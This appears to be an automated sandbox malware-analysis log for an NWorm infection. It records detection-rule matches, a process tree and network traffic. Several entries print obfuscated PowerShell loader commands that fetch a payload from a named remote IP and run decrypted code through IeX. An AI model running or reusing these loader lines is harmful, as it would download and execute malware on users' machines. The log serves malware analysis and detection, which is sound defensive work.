Source: 2.2.powershell.exe.1ad005a9550.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NWorm author = ditekSHen, description = Detects NWorm/N-W0rm payload, clamav_sig = MALWARE.Win.Trojan.NWorm
Source: 00000007.00000000.442084442.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000007.00000000.441493494.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000002.00000002.451128327.000001AD00472000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000002.00000002.454898865.000001AD00EC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000002.00000002.454106266.000001AD00A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000007.00000000.442383411.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000007.00000000.441817870.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: aspnet_regbrowsers.exe PID: 4584, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys

Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\IUGSPQTEVLEHZIDHGXNQCNHSLWPLEZEYTVKQTSPNFSUAGHIJDDWITOGIYIHRFQGEIXYB.VBS"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://103.151.125.186/C/Ps1JDK.txt';Function RRBP([string] $KUFB) {$sFKU = [system.Collections.Generic.list[Byte]]::new();for ($AHYV = 0; $AHYV -lt $KUFB.lengtH; $AHYV +=8) {$sFKU.Add([Convert]::ToByte($KUFB.substring($AHYV, 8), 2))}return [system.Text.encoding]::AsCII.Getstring($sFKU.ToArray())};$eZHV = RRBP 'OWUT1OWUT11OWUT11OWUT111OWUTOWUT11OWUT111OWUT1OWUTOWUTOWUT1OWUT1OWUTOWUT1OWUTOWUT1OWUTOWUT1OWUTOWUT1OWUT1OWUTOWUT111OWUTOWUT1OWUTOWUTOWUT111OWUT1OWUT111OWUT1OWUTOWUT111OWUT1OWUTOWUTOWUT111OWUT1OWUTOWUT11OWUT1OWUT1OWUTOWUT11OWUT1111OWUT1OWUTOWUT1OWUTOWUT1OWUT11OWUT111OWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT1OWUTOWUT111OWUTOWUT1OWUTOWUT111OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT11OWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT1OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT11OWUT111OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUTOWUTOWUTOWUT11OWUTOWUT1OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\tmp2B8A.tmp1991KLI.jar"
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\tmpB97A.tmp1991.jar"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\tmpCECD.tmp1991-10-12-2021.js"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\tmp3E50.tmp4093-10-12-2021.js"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\tmp237D.tmp8904-10-12-2021.js"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\tmp6475.tmpALNLKIGNQCUCWBSGJELSLUQCWNFCQJGCQJJJSOQVT.VBS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://103.151.125.186/A/XADOUYJBEAAKTPUBATDKPHHPFWQWHBJLCEQYKYQXBJVCJFSNIPCUFQWRZQJZZYQWQEIBENEICJLDKPFNEZHXDQGDNDQTJNAPYHD.TXT';( [rUNtIMe.iNTerOpsERVices.mArsHAl]::([rUNtIMe.iNTErOpservIces.MArsHAL].GetMEMbERs()[1].nAMe).Invoke( [rUNtIMe.iNTErOpseRvIces.mArSHAL]::sECURESTRINgtogloBALAlLoCANsI($('76492d1116743f0423413b16050A5345MgB8AHMARgBJAEQATQBLAHMAUQBNAHUASQB0AEIASwBNADcASwBrAGsAVQBpAHcAPQA9AHwAZABhADAAZgA4ADgAZgA2AGQAYgBhADkAMQBmAGQAOQAzAGYAMAA0ADUAOQAzADUANwBiAGQAMwA4ADcAMwAxADEAYwA2AGMAYwA0ADAAZgBlAGYANQBjAGIAYwA3ADkANgBkADIAOQBhADYAZAAyAGMAYgAzADAAOQA2AGIANgBmADEAZgBhAGQAMgAzADcAMwA4AGUAMwBjAGUANwBhADIAZQBiAGEANQBmADIANAAwADEAMQA0AGIAZAAyADkAYwA3ADAANQA4AGIAYQBiAGYAYwAxADQANAAzAGMANwBkADIAMwA0ADQAMABlADQAMQA3AGYANgBiAGEAZQAyAGUANwBlADIAZQA3ADIAMgBmAGUAZAAwADkANgA3ADcAMwA1ADQAMAA5ADcANgA0ADUAOQBkADcAMwAzAGQAOAA3AGUAYwA2ADYAZABhADUANAA0ADcAMwA2ADQAZABhADAAMgA2AGQAMQA5AGQAMgBlADkAZQAyADMAMgBhADEANgAyADcAMAA2AGQAMAA2AGIAYwBjADIANwAwAGQAZgBjAGEAZAAxAGYANQBhADcAOAA5ADIANQBhADQANAAyAA==' \| CONVeRTTo-SECUrEStrIng -kE 90,255,13,102,31,9,186,211,78,88,189,227,80,105,238,83,62,34,152,160,216,150,239,195))))\| IeX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://103.151.125.186/C/Ps1JDK.txt';Function RRBP([string] $KUFB) {$sFKU = [system.Collections.Generic.list[Byte]]::new();for ($AHYV = 0; $AHYV -lt $KUFB.lengtH; $AHYV +=8) {$sFKU.Add([Convert]::ToByte($KUFB.substring($AHYV, 8), 2))}return [system.Text.encoding]::AsCII.Getstring($sFKU.ToArray())};$eZHV = RRBP 'OWUT1OWUT11OWUT11OWUT111OWUTOWUT11OWUT111OWUT1OWUTOWUTOWUT1OWUT1OWUTOWUT1OWUTOWUT1OWUTOWUT1OWUTOWUT1OWUT1OWUTOWUT111OWUTOWUT1OWUTOWUTOWUT111OWUT1OWUT111OWUT1OWUTOWUT111OWUT1OWUTOWUTOWUT111OWUT1OWUTOWUT11OWUT1OWUT1OWUTOWUT11OWUT1111OWUT1OWUTOWUT1OWUTOWUT1OWUT11OWUT111OWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT1OWUTOWUT111OWUTOWUT1OWUTOWUT111OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT11OWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT1OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT11OWUT111OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUTOWUTOWUTOWUT11OWUTOWUT1OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOW	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\tmp2B8A.tmp1991KLI.jar"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\tmpB97A.tmp1991.jar"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49860 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49866 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49868 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49881 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49883 version: TLS 1.2

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49860 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49866 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49868 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49881 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.6:49883 version: TLS 1.2

Source: 7.0.aspnet_regbrowsers.exe.400000.2.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.0.aspnet_regbrowsers.exe.400000.2.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 7.0.aspnet_regbrowsers.exe.400000.4.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.0.aspnet_regbrowsers.exe.400000.4.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 7.0.aspnet_regbrowsers.exe.400000.1.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.0.aspnet_regbrowsers.exe.400000.1.unpack, jwYXtQrwHZzRIA/kOpUiiERlBfodxk.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
